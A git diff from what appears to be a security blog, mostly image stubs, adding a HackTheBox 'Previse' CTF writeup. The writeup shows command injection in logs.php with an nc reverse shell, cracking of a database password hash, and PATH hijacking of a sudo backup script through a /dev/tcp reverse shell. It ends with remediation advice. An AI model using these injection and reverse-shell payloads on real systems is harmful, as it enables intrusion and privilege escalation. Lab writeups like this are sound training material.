0000000..e353f45 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44cd015c0ca870ba4585094175d606117b6f619d21dcced3f82042a33c930abe +size 78309 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-12.webp b/content/writeup-ctf/writeup-previse-htb/img/image-12.webp new file mode 100644 index 0000000..eb44342 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d7b1dc6dc600f9810407cbd164e5d1cd67abbae8da1b19ed0cbd4a8391d4572 +size 63604 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-13.png b/content/writeup-ctf/writeup-previse-htb/img/image-13.png new file mode 100644 index 0000000..a0d017a --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:327652e47d079e1afbfe3f1e0696a45afdedeccb8bea359322c3c8d9a668e651 +size 27456 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-13.webp b/content/writeup-ctf/writeup-previse-htb/img/image-13.webp new file mode 100644 index 0000000..6422490 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9998eb9c211eb127686cf5a80226444fc980f5cc46090061486612507ba41352 +size 29516 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-14.png b/content/writeup-ctf/writeup-previse-htb/img/image-14.png new file mode 100644 index 0000000..56b8eb5 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff77287e44545a054872984ffd8fd8ab2078456f753d71bd1c38af04739a0df8 +size 19139 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-14.webp b/content/writeup-ctf/writeup-previse-htb/img/image-14.webp new file mode 100644 index 0000000..0b09cb6 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6607ca7d38c1aed95efb3607d76272b438e9c9cfe8eaa419fec2a2e6ee00f9f0 +size 18876 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-2.png b/content/writeup-ctf/writeup-previse-htb/img/image-2.png new file mode 100644 index 0000000..6b89e53 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c42151a19dccfbeb83b0abfae8bb3edf8d577a8f9968793d099b078dbb1c9cb5 +size 33756 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-2.webp b/content/writeup-ctf/writeup-previse-htb/img/image-2.webp new file mode 100644 index 0000000..19df5ce --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97a395f28f162d9359f3e1d1fefda154f33bc5ceb74776ef68dacc584bbc8063 +size 19572 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-3.png b/content/writeup-ctf/writeup-previse-htb/img/image-3.png new file mode 100644 index 0000000..32f06aa --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f49389d82f4296e8755fba7a71d168b7a1cdaa9fbf68a9ed8406480a66df8d5d +size 117782 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-3.webp b/content/writeup-ctf/writeup-previse-htb/img/image-3.webp new file mode 100644 index 0000000..d6f399b --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2be5109bb55d9184003298dab9ffb4200c5d8114f515824194bf33e3e72e777 +size 99392 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-4.png b/content/writeup-ctf/writeup-previse-htb/img/image-4.png new file mode 100644 index 0000000..13d8806 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a9e7c0dad2e6dde8c5df0931dcc4d5a3d6e1c6c3775802a9b11d1c1c07cbf1fc +size 11627 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-4.webp b/content/writeup-ctf/writeup-previse-htb/img/image-4.webp new file mode 100644 index 0000000..9a3db2c --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b688e037569b5e46e8038732a6e3130b231b0dbd2c6273e7e5c80eddfb0224b +size 10488 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-5.png b/content/writeup-ctf/writeup-previse-htb/img/image-5.png new file mode 100644 index 0000000..dc04446 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca6f99bb5a1b408a66ea5cf9247b2f57b5f8bfe49bdc0993a3bdce008708fbbf +size 42556 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-5.webp b/content/writeup-ctf/writeup-previse-htb/img/image-5.webp new file mode 100644 index 0000000..cb190dc --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:129bff72546e011542b692ff1516d624ea404ef609d3a3eaaca8796abad33ca9 +size 45570 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-6.png b/content/writeup-ctf/writeup-previse-htb/img/image-6.png new file mode 100644 index 0000000..e60e26d --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b14c0cd543f8c4de7ad907efcd4ff1f5bc55aadbc1ce592ea72881b13ae1a61 +size 18656 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-6.webp b/content/writeup-ctf/writeup-previse-htb/img/image-6.webp new file mode 100644 index 0000000..7e20983 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80130de65298ef6fddafa10e3486e9e47287d8f4bf051dc8924dbe3478f7b393 +size 11796 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-7.png b/content/writeup-ctf/writeup-previse-htb/img/image-7.png new file mode 100644 index 0000000..1747a6e --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a33447cbe338528ad40490ae58ff450bf3ee733fd1d069ee90fa348ba65ecdd2 +size 22811 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-7.webp b/content/writeup-ctf/writeup-previse-htb/img/image-7.webp new file mode 100644 index 0000000..4343609 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:11a0f3f9621782c271b6f76ba7f372f8654c0d101b0fe14587cb581b6f18fedd +size 14008 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-8.png b/content/writeup-ctf/writeup-previse-htb/img/image-8.png new file mode 100644 index 0000000..fa9c9bd --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f3247775533cbd65c78c6ec6e3cdd0fb0d2146cd7afb70201f9e7d70f654fd8 +size 76861 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-8.webp b/content/writeup-ctf/writeup-previse-htb/img/image-8.webp new file mode 100644 index 0000000..f6fc3a4 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7dd4c594eb011029d8b001b966895c9647b99450e0e18af3c2149fdbcfb7e47a +size 63944 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-9.png b/content/writeup-ctf/writeup-previse-htb/img/image-9.png new file mode 100644 index 0000000..46a235d --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f6e0d76ed83acfe9ab45c680052b9012e17ab12767b19e7163d62063f9acdf3 +size 11229 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-9.webp b/content/writeup-ctf/writeup-previse-htb/img/image-9.webp new file mode 100644 index 0000000..f965724 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:296b7d4b3af55af2e1146448c90fbe0a9550f46784ea37a90d3122190fe6a251 +size 10806 diff --git a/content/writeup-ctf/writeup-previse-htb/index.md b/content/writeup-ctf/writeup-previse-htb/index.md new file mode 100644 index 0000000..4b4cd13 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/index.md @@ -0,0 +1,247 @@ +--- +title: "Writeup - Previse (HTB)" +date: 2022-03-23 +slug: "writeup-previse-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Previse](https://app.hackthebox.com/machines/Previse) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.104 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (Apache 2.4.49) + +![](img/image-2.webp) + +## Exploit + +First of all, I start by listing the pages of the site with `ffuf`. After a first execution of the command, I notice that there are few pages, I run the command again with a filter to find particular `.php` pages. + +![](img/image-3.webp) + +There are a lot of pages and one in particular that catches my attention : `nav.php`. + +![](img/image-4.webp) + +One page in the list is particularly interesting : `CREATE ACCOUNT`. Which refers to `accounts.php`. The only problem is that if I try to go on the page with a browser I am redirected to `login.php` immediately. So I make a `curl` request to try to see the content of the account page. + +![](img/image-5.webp) + +On this page we find a form to create an account. Since it is a simple redirection, it is normally possible to make a direct request with the form without being impacted by the redirection to `login.php`. To do so, create the following request with burp : + + +```bash +POST /accounts.php HTTP/1.1 +Host: 10.10.11.104 +Content-Length: 46 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://10.10.11.104 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://10.10.11.104/accounts.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=qmeps94op0toeahb44u0qh6eds +Connection: close + +username=azerty&password=azerty&confirm=azerty + +``` +I now have an account and can connect to the web interface. + +![](img/image-6.webp) + +On this web interface, we find a certain number of information, in particular a page to download logs : `file_logs.php`. But also a page to upload files : `files.php`. + + +```bash +time user fileID +1622482496 m4lwhere 4 +1622485614 m4lwhere 4 +1622486215 m4lwhere 4 +1622486218 m4lwhere 1 +1622486221 m4lwhere 1 +1622678056 m4lwhere 5 +1622678059 m4lwhere 6 +1622679247 m4lwhere 1 +1622680894 m4lwhere 5 +1622708567 m4lwhere 4 +1622708573 m4lwhere 4 +1622708579 m4lwhere 5 +1622710159 m4lwhere 4 +1622712633 m4lwhere 4 +1622715674 m4lwhere 24 +1622715842 m4lwhere 23 +1623197471 m4lwhere 25 +1623200269 m4lwhere 25 +1623236411 m4lwhere 23 +1623236571 m4lwhere 26 +1623238675 m4lwhere 23 +1623238684 m4lwhere 23 +1623978778 m4lwhere 32 +``` + +[](img/image-7.webp) + +I find that we have the possibility to download a backup of the site files. I download the archive and find a `config.php` file in which we find the credentials of the mysql database. + + +```bash + +``` +I also find in the `logs.php` file that the page executes a shell command when we make a request on this same page. + +![](img/image-8.webp) + +So I will be able to inject a command during a request and create a reverse shell. To do this I create the following request: + + +```bash +POST /logs.php HTTP/1.1 +Host: 10.10.11.104 +Content-Length: 44 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://10.10.11.104 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://10.10.11.104/file_logs.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=qmeps94op0toeahb44u0qh6eds +Connection: close + +delim=comma; nc 10.10.16.3 1234 -e /bin/bash +``` +![](img/image-9.webp) + +I now have a reverse shell as `www-data`. I use credentials to connect to the mysql database: + +![](img/image-10.webp) + +I enter in the `previse` database, then I list the tables : + +![](img/image-11.webp) + +The  `accounts` table is interesting, I extract the data with the following command: + + +```bash +mysql> SELECT * from accounts; +SELECT * from accounts; ++----+----------+------------------------------------+---------------------+ +| id | username | password | created_at | ++----+----------+------------------------------------+---------------------+ +| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 | +| 2 | azerty | $1$🧂llol$Vxo8V803JRfho0nQ/u2/T0 | 2022-03-21 10:43:49 | ++----+----------+------------------------------------+---------------------+ +2 rows in set (0.00 sec) +``` +We find the hash of the user `m4lwhere`. We will use hashcat and rockyou to crack the hash. To do this I use the following command: + + +```bash +hashcat.exe -m 500 -a 0 .\hash.txt .\rockyou.txt +hashcat (v6.2.5) starting +[...] +Hashes: 1 digests; 1 unique digests, 1 unique salts +Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates +Rules: 1 + +Optimizers applied: +* Zero-Byte +* Single-Hash +* Single-Salt + +[...] + +Dictionary cache built: +* Filename..: .\rockyou.txt +* Passwords.: 14344392 +* Bytes.....: 139921507 +* Keyspace..: 14344385 +* Runtime...: 0 secs + +$1$­ƒºéllol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235! +[...] +``` + +{{< alert icon="circle-info" >}} +To save time I switched to Windows to take advantage of the power of my GPU. Depending on your configuration, it can take more or less time. +{{< /alert >}} + +Ok we find that the password of this user is `ilovecody112235!`. I connect to the user with SSH : + +![](img/image-12.webp) + +I now have a shell with the user `m4lwhere` and I get the first flag. + +## Privilege escalation + +At first I check if the user has SUDO authorization on some order: + + +```bash +m4lwhere@previse:~$ sudo -l +User m4lwhere may run the following commands on previse: + (root) /opt/scripts/access_backup.sh +``` +The user can run the script `access_backup.sh` with root privileges. Let's see what this script does: + +![](img/image-13.webp) + +This script is quite simple, it creates backups of Apache logs. Interestingly, the script does not use the absolute path of the Gzip program. So we will be able to manipulate the PATH variable so that the script uses an alternative version that we will create. + +So I create a `gzip` file in the `/tmp` folder with the following content: + + +```bash +#!/bin/bash + +/bin/bash -i >& /dev/tcp/10.10.14.17/1234 0>&1 +``` +I then add the execution rights, and I add `/tmp` in the PATH variable. I then execute the script with sudo. + + +```bash +chmod +x /tmp/gzip +export PATH="/tmp:$PATH" +sudo /opt/scripts/access_backup.sh +``` +![](img/image-14.webp) + +I now have a root shell and can retrieve the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not use shell commands in pages accessible by everyone +- Parse form inputs correctly to avoid injection +- Do not leave credentials in public backups +- Use absolute path in scripts using external programs to avoid PATH manipulations diff --git a/content/writeup-ctf/writeup-road-thm/featured.png b/content/writeup-ctf/writeup-road-thm/featured.png new file mode 100644 index 0000000..7a73654 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86ce8520295c56dd55724741e9c39682af756a81637204b985f8130ca12fed28 +size 645512 diff --git a/content/writeup-ctf/writeup-road-thm/featured.webp b/content/writeup-ctf/writeup-road-thm/featured.webp new file mode 100644 index 0000000..545d1c1 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3d690faf8ea41dd767ad8150283b8f3a93dd2c6bb2677d4914bffc06cb86ff9 +size 702586 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-1.png b/content/writeup-ctf/writeup-road-thm/img/image-1.png new file mode 100644 index 0000000..d81169b --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e79f559f6b7a53dee5b1044b5307af9d355365db4012fbd8ca2e946d5019db14 +size 35044 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-1.webp b/content/writeup-ctf/writeup-road-thm/img/image-1.webp new file mode 100644 index 0000000..83d0819 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:769370f95c5086abfce459d84c3b648574b29f08afbfd3be08e1bec9cf5ee5ad +size 31926 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-10.png b/content/writeup-ctf/writeup-road-thm/img/image-10.png new file mode 100644 index 0000000..a55a9fd --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71d801190b95d19988e671eb3eac39ca28b286d820f051e7f6a27e390186dcef +size 9403 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-10.webp b/content/writeup-ctf/writeup-road-thm/img/image-10.webp new file mode 100644 index 0000000..6954d07 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5fe450d3c8a9ac426916119f91bba98294bdbdbbbf3563ab3310a8254e2e2cb9 +size 6742 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-11.png b/content/writeup-ctf/writeup-road-thm/img/image-11.png new file mode 100644 index 0000000..e01c65a --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b61fdf4b7ce2171d1cdbd6121cbe40ea94c1d3f90161a746e20f679770aba97 +size 29002 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-11.webp b/content/writeup-ctf/writeup-road-thm/img/image-11.webp new file mode 100644 index 0000000..ec6cb70 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cc7ff49a84dbdfa4c8a1d1fc04c5d6ec8299965e33fabb867fb134a812a7a394 +size 27566 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-12.png b/content/writeup-ctf/writeup-road-thm/img/image-12.png new file mode 100644 index 0000000..009a4ef --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e94995c2162500fe3ed70c35e7f27e62beca2fcdf2f888dc0d4cfaf8ae44ee4 +size 83653 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-12.webp b/content/writeup-ctf/writeup-road-thm/img/image-12.webp new file mode 100644 index 0000000..753e823 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5a289fbf74435eff97d12c8a393016d22cc066c7391ae294f5ba325deb3a715 +size 91814 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-13.png b/content/writeup-ctf/writeup-road-thm/img/image-13.png new file mode 100644 index 0000000..0d8ecce --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbbdedda7dfea4245580daade192eade96839189be45d9ad2e62cff555720fc8 +size 3532 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-13.webp b/content/writeup-ctf/writeup-road-thm/img/image-13.webp new file mode 100644 index 0000000..3d871b7 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3d723461c60b63bccd696290de918ba4122f6726d96384fe18e203270c7f6ac5 +size 4754 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-14.png b/content/writeup-ctf/writeup-road-thm/img/image-14.png new file mode 100644 index 0000000..6a0837d --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3bb43c0d39dbb3f88664af3dc6ef192bac7c4a7c493285aef1e949629c362e42 +size 33252 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-14.webp b/content/writeup-ctf/writeup-road-thm/img/image-14.webp new file mode 100644 index 0000000..fe1dff9 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65691d526aaf7d5e7606cc3cfea646265db9fc5d6c7faa3349bc71c356cc933e +size 30066 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-15.png b/content/writeup-ctf/writeup-road-thm/img/image-15.png new file mode 100644 index 0000000..0c90137 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0ef517b7d4bccf433ef5be1b27ef166ac477f6c5cbd6a9dc52a5511b9fcd8b7 +size 18332 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-15.webp b/content/writeup-ctf/writeup-road-thm/img/image-15.webp new file mode 100644 index 0000000..9e521e0 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f93077b9ed1d1a671fe86a5f134fe36fbd84b6b18eaecbf9029e53c6c1d17990 +size 21202 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-16.png b/content/writeup-ctf/writeup-road-thm/img/image-16.png new file mode 100644 index 0000000..0c55dde --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-16.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c188d2fe85b6c1f5f78cdb322231f8dde0615cc3e7753643d829f8534ece2cf6 +size 12383 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-16.webp b/content/writeup-ctf/writeup-road-thm/img/image-16.webp new file mode 100644 index 0000000..4369119 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-16.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7e5c29785dca861e2ae23af8a3634340a573747ac1164b633dcb4df2e5ecfba +size 13372 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-2.png b/content/writeup-ctf/writeup-road-thm/img/image-2.png new file mode 100644 index 0000000..1bed912 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:965aaff72cd6aa7775228b92afe9f1d6b1d684ff233223bb599e62274a636931 +size 1179085 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-2.webp b/content/writeup-ctf/writeup-road-thm/img/image-2.webp new file mode 100644 index 0000000..f8103af --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d423cefafba2d002641aaa7975fcf93e3a562746636d0e94d0c71f46e798fa12 +size 132978 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-3.png b/content/writeup-ctf/writeup-road-thm/img/image-3.png new file mode 100644 index 0000000..0ec3f00 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4968038694a5e4213e300c9100d1b54fc1c53f76426b4a6229bfd1ba5c9a884 +size 64618 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-3.webp b/content/writeup-ctf/writeup-road-thm/img/image-3.webp new file mode 100644 index 0000000..f1f10f0 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:daab3797cb6193d0fc1407e8a69c33b67e90e606f8023c4daddd2146a001bdc8 +size 53432 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-4.png b/content/writeup-ctf/writeup-road-thm/img/image-4.png new file mode 100644 index 0000000..31fe579 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0fee7577c6dc19e119c5fe68bf90297b03bf52169ed9c3abcffbf611b09cae9 +size 25270 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-4.webp b/content/writeup-ctf/writeup-road-thm/img/image-4.webp new file mode 100644 index 0000000..0f403fb --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:99a84dab7339cb7b3d93b62ec10ce2264a3e21e49d16d1b257cbbae4f59a3309 +size 6814 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-5.png b/content/writeup-ctf/writeup-road-thm/img/image-5.png new file mode 100644 index 0000000..3c0cc63 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e04c590d21ad7896b36e01d1c0e71c44b9947c26800d574ae41f5dbd2b45b0fc +size 62289 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-5.webp b/content/writeup-ctf/writeup-road-thm/img/image-5.webp new file mode 100644 index 0000000..45c217c --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b764904f9e37f078c5d1e60ca150830fa5c9b80dd8cf52420474aa3e35d8a01a +size 30022 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-6.png b/content/writeup-ctf/writeup-road-thm/img/image-6.png new file mode 100644 index 0000000..52e92e1 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6feb257fa4ece9eb078560332eb5769975aae5dac06ed0ba012a05ec9502d34 +size 10381 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-6.webp b/content/writeup-ctf/writeup-road-thm/img/image-6.webp new file mode 100644 index 0000000..1e95b7c --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63628b790496e553fd617987f74765f870afbbbb1836619653e435e663337747 +size 5752 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-7.png b/content/writeup-ctf/writeup-road-thm/img/image-7.png new file mode 100644 index 0000000..d6080a4 --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:de0bde92acb3398f1e1de9fa3f045f49e2b3580ac27e76f2d7968d932d7e060c +size 9186 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-7.webp b/content/writeup-ctf/writeup-road-thm/img/image-7.webp new file mode 100644 index 0000000..ea2610a --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ca9693589d1cbbb54fa4fc4612977611d5511954e8933f4702bc3e5bfc5b166 +size 4558 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-8.png b/content/writeup-ctf/writeup-road-thm/img/image-8.png new file mode 100644 index 0000000..33d0f3d --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6dd1edddda21f4b5a4587df30ee9be172dabafce590b5519bc8b6b2d1b99210 +size 103517 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-8.webp b/content/writeup-ctf/writeup-road-thm/img/image-8.webp new file mode 100644 index 0000000..8e235bc --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4150697566fb5b165cf606ca5b792a82b84a9369e5247958962689ed3a53903b +size 95612 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-9.png b/content/writeup-ctf/writeup-road-thm/img/image-9.png new file mode 100644 index 0000000..5b43a4c --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-9.png @@ -0,0 +1,3 @@ +version 